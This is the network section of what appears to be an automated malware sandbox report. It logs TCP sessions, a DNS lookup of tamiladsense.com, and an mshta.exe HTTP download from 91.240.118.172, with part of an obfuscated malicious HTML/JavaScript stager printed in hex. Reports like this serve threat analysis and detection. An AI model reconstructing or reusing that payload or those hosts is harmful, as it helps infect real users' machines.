                                                                                                                    Jan 28, 2022 21:15:08.932854891 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.932857990 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.932898998 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.932940960 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.932944059 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.932980061 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.933022022 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.933047056 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.933062077 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.933088064 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.933103085 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.933145046 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.933182001 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.933188915 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.933223009 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.933264971 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.933303118 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.933316946 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.933335066 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.933341980 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.933381081 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.933422089 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.933433056 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072041988 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072072029 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072089911 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072108030 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072124958 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072141886 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072160006 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072179079 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072179079 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072196007 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072196007 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072202921 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072206020 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072208881 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072216034 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072222948 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072226048 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072228909 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072232962 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072242975 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072251081 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072263002 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072268963 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072278023 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072285891 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072288990 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072303057 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072313070 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072319984 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072329044 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072338104 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072350025 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072355986 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072365999 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072372913 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072390079 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072406054 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072408915 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072413921 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072419882 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072434902 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072438002 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072443962 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072452068 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072457075 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072470903 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072473049 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072484016 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072489977 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072500944 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072508097 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072520018 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072527885 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072537899 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072550058 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072556973 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072567940 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072571039 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072583914 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072592020 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072602987 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072603941 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072619915 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072622061 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072637081 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072638988 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072654963 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072658062 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072671890 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072674990 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072689056 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072693110 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072706938 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072722912 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072726011 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072740078 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072741985 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072750092 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072757006 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072760105 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072774887 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072777987 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072788000 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072794914 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072810888 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072813034 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072830915 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072834015 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072849035 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072850943 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072866917 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072870016 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072885990 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072886944 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072902918 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072906017 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072918892 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072922945 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072937012 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072943926 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072953939 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072957993 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072973013 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072974920 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072990894 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072994947 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.073007107 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.073010921 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.073024988 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.073029041 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.073041916 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.073046923 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.073059082 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.073061943 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.073076963 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.073079109 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.073093891 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.073095083 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.073111057 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.073113918 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.073124886 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.073132992 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.073148966 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.073163986 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.073698044 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.073714972 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.073745012 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.073771954 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.073822975 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.073839903 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.073874950 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.073893070 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.073909998 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.073929071 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.073946953 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.073964119 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.073970079 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.073975086 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.073976994 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.073980093 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.073982954 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.073985100 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.073987961 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.074011087 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.211781979 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.211815119 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.211838961 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.211853981 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.211858988 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.211872101 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.211874962 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.211880922 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.211893082 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.211901903 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.211910009 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.211921930 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.211934090 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.211944103 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.211947918 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.211963892 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.211985111 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.211986065 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.211999893 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.212007046 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.212019920 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.212027073 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.212043047 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.212048054 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.212059021 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.212069035 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.212078094 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.212090969 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.212097883 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.212111950 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.212146997 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.212189913 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:15.811451912 CET4916580192.168.2.2291.240.118.172
                                                                                                                    Jan 28, 2022 21:15:19.085091114 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:19.085184097 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:16:12.729248047 CET804916691.240.118.172192.168.2.22
                                                                                                                    Jan 28, 2022 21:16:12.729347944 CET4916680192.168.2.2291.240.118.172
                                                                                                                    Jan 28, 2022 21:16:47.766840935 CET4916680192.168.2.2291.240.118.172
                                                                                                                    Jan 28, 2022 21:16:47.829652071 CET804916691.240.118.172192.168.2.22
                                                                                                                    Jan 28, 2022 21:16:49.232790947 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:16:49.622658014 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:16:50.402673960 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:16:51.978380919 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:16:52.518960953 CET491698080192.168.2.2274.207.230.120
                                                                                                                    Jan 28, 2022 21:16:52.668005943 CET80804916974.207.230.120192.168.2.22
                                                                                                                    Jan 28, 2022 21:16:53.179825068 CET491698080192.168.2.2274.207.230.120
                                                                                                                    Jan 28, 2022 21:16:53.328888893 CET80804916974.207.230.120192.168.2.22
                                                                                                                    Jan 28, 2022 21:16:53.834986925 CET491698080192.168.2.2274.207.230.120
                                                                                                                    Jan 28, 2022 21:16:53.983943939 CET80804916974.207.230.120192.168.2.22
                                                                                                                    Jan 28, 2022 21:16:55.114238024 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:17:01.106915951 CET491708080192.168.2.22139.196.72.155
                                                                                                                    Jan 28, 2022 21:17:01.347357035 CET808049170139.196.72.155192.168.2.22
                                                                                                                    Jan 28, 2022 21:17:01.347501993 CET491708080192.168.2.22139.196.72.155
                                                                                                                    Jan 28, 2022 21:17:01.354774952 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:17:01.429132938 CET491708080192.168.2.22139.196.72.155
                                                                                                                    Jan 28, 2022 21:17:01.669475079 CET808049170139.196.72.155192.168.2.22
                                                                                                                    Jan 28, 2022 21:17:01.684583902 CET808049170139.196.72.155192.168.2.22
                                                                                                                    Jan 28, 2022 21:17:01.684613943 CET808049170139.196.72.155192.168.2.22
                                                                                                                    Jan 28, 2022 21:17:01.684640884 CET491708080192.168.2.22139.196.72.155
                                                                                                                    Jan 28, 2022 21:17:01.684664011 CET491708080192.168.2.22139.196.72.155
                                                                                                                    Jan 28, 2022 21:17:01.697899103 CET491708080192.168.2.22139.196.72.155
                                                                                                                    Jan 28, 2022 21:17:01.940352917 CET808049170139.196.72.155192.168.2.22
                                                                                                                    Jan 28, 2022 21:17:01.940445900 CET491708080192.168.2.22139.196.72.155
                                                                                                                    Jan 28, 2022 21:17:03.621016026 CET491708080192.168.2.22139.196.72.155
                                                                                                                    Jan 28, 2022 21:17:03.900831938 CET808049170139.196.72.155192.168.2.22
                                                                                                                    Jan 28, 2022 21:17:04.754029989 CET808049170139.196.72.155192.168.2.22
                                                                                                                    Jan 28, 2022 21:17:04.754139900 CET491708080192.168.2.22139.196.72.155
                                                                                                                    Jan 28, 2022 21:17:07.754678011 CET808049170139.196.72.155192.168.2.22
                                                                                                                    Jan 28, 2022 21:17:07.754709005 CET808049170139.196.72.155192.168.2.22
                                                                                                                    Jan 28, 2022 21:17:07.754767895 CET491708080192.168.2.22139.196.72.155

                                                                                                                    UDP Packets

                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Jan 28, 2022 21:15:07.777925014 CET5216753192.168.2.228.8.8.8
                                                                                                                    Jan 28, 2022 21:15:07.797043085 CET53521678.8.8.8192.168.2.22

                                                                                                                    DNS Queries

                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                    Jan 28, 2022 21:15:07.777925014 CET192.168.2.228.8.8.80x56d6Standard query (0)tamiladsense.comA (IP address)IN (0x0001)

                                                                                                                    DNS Answers

                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                    Jan 28, 2022 21:15:07.797043085 CET8.8.8.8192.168.2.220x56d6No error (0)tamiladsense.com136.0.111.15A (IP address)IN (0x0001)

                                                                                                                    HTTP Request Dependency Graph

                                                                                                                    • 91.240.118.172
                                                                                                                    • tamiladsense.com

                                                                                                                    HTTP Packets

                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    0192.168.2.224916591.240.118.17280C:\Windows\System32\mshta.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    Jan 28, 2022 21:15:03.049511909 CET0OUTGET /ee/ss/se.html HTTP/1.1
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US
                                                                                                                    UA-CPU: AMD64
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                    Host: 91.240.118.172
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 28, 2022 21:15:03.108724117 CET2INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.20.2
                                                                                                                    Date: Fri, 28 Jan 2022 20:15:03 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: keep-alive
                                                                                                                    Data Raw: 32 62 32 37 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 27 20 63 6f 6e 74 65 6e 74 3d 27 45 6d 75 6c 61 74 65 49 45 39 27 3e 3c 73 63 72 69 70 74 3e 6c 31 6c 3d 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 4d 6f 64 65 7c 7c 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 3b 76 61 72 20 66 39 66 37 36 63 3d 74 72 75 65 3b 6c 6c 31 3d 64 6f 63 75 6d 65 6e 74 2e 6c 61 79 65 72 73 3b 6c 6c 6c 3d 77 69 6e 64 6f 77 2e 73 69 64 65 62 61 72 3b 66 39 66 37 36 63 3d 28 21 28 6c 31 6c 26 26 6c 6c 31 29 26 26 21 28 21 6c 31 6c 26 26 21 6c 6c 31 26 26 21 6c 6c 6c 29 29 3b 6c 5f 6c 6c 3d 6c 6f 63 61 74 69 6f 6e 2b 27 27 3b 6c 31 31 3d 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 66 75 6e 63 74 69 6f 6e 20 6c 49 31 28 6c 31 49 29 7b 72 65 74 75 72 6e 20 6c 31 31 2e 69 6e 64 65 78 4f 66 28 6c 31 49 29 3e 30 3f 74 72 75 65 3a 66 61 6c 73 65 7d 3b 6c 49 49 3d 6c 49 31 28 27 6b 68 74 27 29 7c 6c 49 31 28 27 70 65 72 27 29 3b 66 39 66 37 36 63 7c 3d 6c 49 49 3b 7a 4c 50 3d 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 27 30 46 44 27 3b 6a 50 36 34 35 45 38 4d 70 38 54 50 54 3d 6e 65 77 20 41 72 72 61 79 28 29 3b 6f 56 35 31 31 42 59 52 75 6f 32 69 68 3d 6e 65 77 20 41 72 72 61 79 28 29 3b 6f 56 35 31 31 42 59 52 75 6f 32 69 68 5b 30 5d 3d 27 67 25 37 38 25 36 39 25 36 45 5c 31 30 33 25 33 38 25 33 38 5c 31 31 37 27 20 20 20 3b 6a 50 36 34 35 45 38 4d 70 38 54 50 54 5b 30 5d 3d 27 7f 3c 7f 21 7f 44 7f 4f 7f 43 7f 54 7f 59 7f 50 7f 45 7f 20 7f 68 7f 74 7f 6d 7f 6c 7f 20 7f 50 7f 55 7f 42 7f 4c 7f 49 7f 43 7f 20 7f 22 7f 2d 7f 2f 7f 2f 7f 57 7f 33 7f 43 7e 18 7f 44 7f 54 7f 44 7f 20 7f 58 7f 48 7f 54 7f 4d 7f 4c 7f 20 7f 31 7f 2e 7f 30 7f 20 7f 54 7f 72 7f 61 7f 6e 7f 73 7f 69 7f 74 7f 69 7f 6f 7f 6e 7f 61 7f 6c 7e 18 7f 45 7f 4e 7f 22 7e 15 7e 5c 6e 7f 74 7f 70 7f 3a 7e 18 7f 77 7e 42 7f 2e 7f 77 7f 33 7f 2e 7f 6f 7f 72 7f 67 7f 2f 7f 54 7f 52 7f 2f 7f 78 7e 5c 6e 7e 0c 7f 31 7f 2f 7e 1e 7f 44 7e 4e 7e 50 7f 6c 7f 31 7f 2d 7f 74 7e 2d 7e 2f 7e 31 7e 33 7e 35 7f 6c 7f 2e 7f 64 7f 74 7f 64 7f 22 7f 3e 7f 3c 7e 57 7f 20 7f 78 7e 0c 7e 2f 7f 3d 7f 22 7e 3d 7e 3f 7e 41 7e 43 7e 45 7e 47 7e 49 7f 2f 7f 31 7f 39 7e 79 7e 56 7e 0b 7f 6c 7e 66 7e 68 7f 65 7f 61 7f 64 7e 67 7f 73 7f 63 7f 72 7f 69 7f 70 7f 74 7f 3e 7f 65 7f 76 7e 36 7f 28 7f 75 7f 6e 7f 65 7d 04 7f 61 7f 70 7f 65 7f 28 7f 5c 27 7f 25 7f 37 7f 36 7f 25 7f 36 7f 31 7f 5c 5c 7f 31 7f 36 7f 32 7f 25 7f 32 7f 30 7d 1e 7d 1c 